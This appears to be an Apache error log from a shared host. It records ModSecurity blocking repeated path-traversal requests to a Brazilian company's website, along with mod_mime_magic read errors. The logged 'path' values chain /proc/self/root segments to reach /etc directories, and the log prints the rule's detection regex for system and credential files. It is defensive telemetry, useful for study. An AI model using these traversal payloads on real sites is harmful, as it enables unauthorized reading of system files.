[Fri Mar 20 07:33:06.583570 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.241.31:58140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iYrninkcc-iUj5ApZewAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:33:24.147944 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:58732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0idDJ3M9BSuKP7CAYVIwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:33:26.594064 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:53970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0idgF0L0L-SsrnPo5jDAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 07:33:28.217400 2026] [mime_magic:error] [pid 9818:tid 140411716749056] (70014)End of file found: [client 57.141.18.1:58078] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:33:40.087547 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:33140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iguoXxyEfFpUF8f98GAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:33:46.627088 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:40864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iivqxLDW4GITHUkThDAAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:33:48.075212 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:44704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ijNa6ubjKNq_cu4bPKgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:33:50.695125 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:44706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ijta6ubjKNq_cu4bPLgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:33:53.898733 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:44710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ikfHIg5MgXLBnicPyrwAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:33:54.011053 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:53972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ikvXLqtnMIWvjpaKU-QAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:33:59.870679 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:53972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0il_XLqtnMIWvjpaKVAAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:34:00.333805 2026] [mime_magic:error] [pid 26799:tid 140411624429312] (70014)End of file found: [client 74.7.241.31:44724] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var
[Fri Mar 20 07:34:05.954962 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:46302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0imhCii7xarUs8iHZidwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:34:18.705787 2026] [mime_magic:error] [pid 10189:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:60190] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:34:24.762966 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:46310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0isBCii7xarUs8iHZimAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:34:39.927167 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:54624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ivwF0L0L-SsrnPo5jeQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:34:43.366125 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:36690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iw_qxLDW4GITHUkThUgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:35:05.976802 2026] [mime_magic:error] [pid 11642:tid 140411691570944] (70014)End of file found: [client 57.141.18.26:34870] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:35:17.162938 2026] [mime_magic:error] [pid 7893:tid 140411582465792] (70014)End of file found: [client 57.141.18.84:35444] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:35:40.884647 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:36700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0i_DJ3M9BSuKP7CAYV0wAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:35:45.642123 2026] [mime_magic:error] [pid 11642:tid 140411725141760] (70014)End of file found: [client 57.141.18.52:36962] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:35:47.525892 2026] [mime_magic:error] [pid 11167:tid 140411607643904] (70014)End of file found: [client 74.7.241.31:36138] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/lib
[Fri Mar 20 07:35:57.305244 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:39262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jDfHIg5MgXLBnicPzSgAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:36:16.541794 2026] [mime_magic:error] [pid 7235:tid 140411683178240] (70014)End of file found: [client 57.141.18.36:38204] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:36:18.468612 2026] [mime_magic:error] [pid 15826:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:38346] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:36:20.637765 2026] [mime_magic:error] [pid 7893:tid 140411548894976] (70014)End of file found: [client 57.141.18.58:38450] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:36:42.316848 2026] [:error] [pid 7235:tid 140411641214720] [client 216.73.216.191:54459] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jOvqxLDW4GITHUkTh7QAAAQw"]
[Fri Mar 20 07:37:17.095181 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:60492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jXRCii7xarUs8iHZjVgAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:37:18.651219 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:59342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jXhCii7xarUs8iHZjXAAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:37:20.558064 2026] [mime_magic:error] [pid 7235:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:41772] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:37:33.603499 2026] [:error] [pid 7893:tid 140411649607424] [client 216.73.216.191:26921] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbRCii7xarUs8iHZjZQAAAgs"]
[Fri Mar 20 07:37:33.606568 2026] [:error] [pid 7235:tid 140411607643904] [client 216.73.216.191:55080] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbfqxLDW4GITHUkTiMgAAARA"]
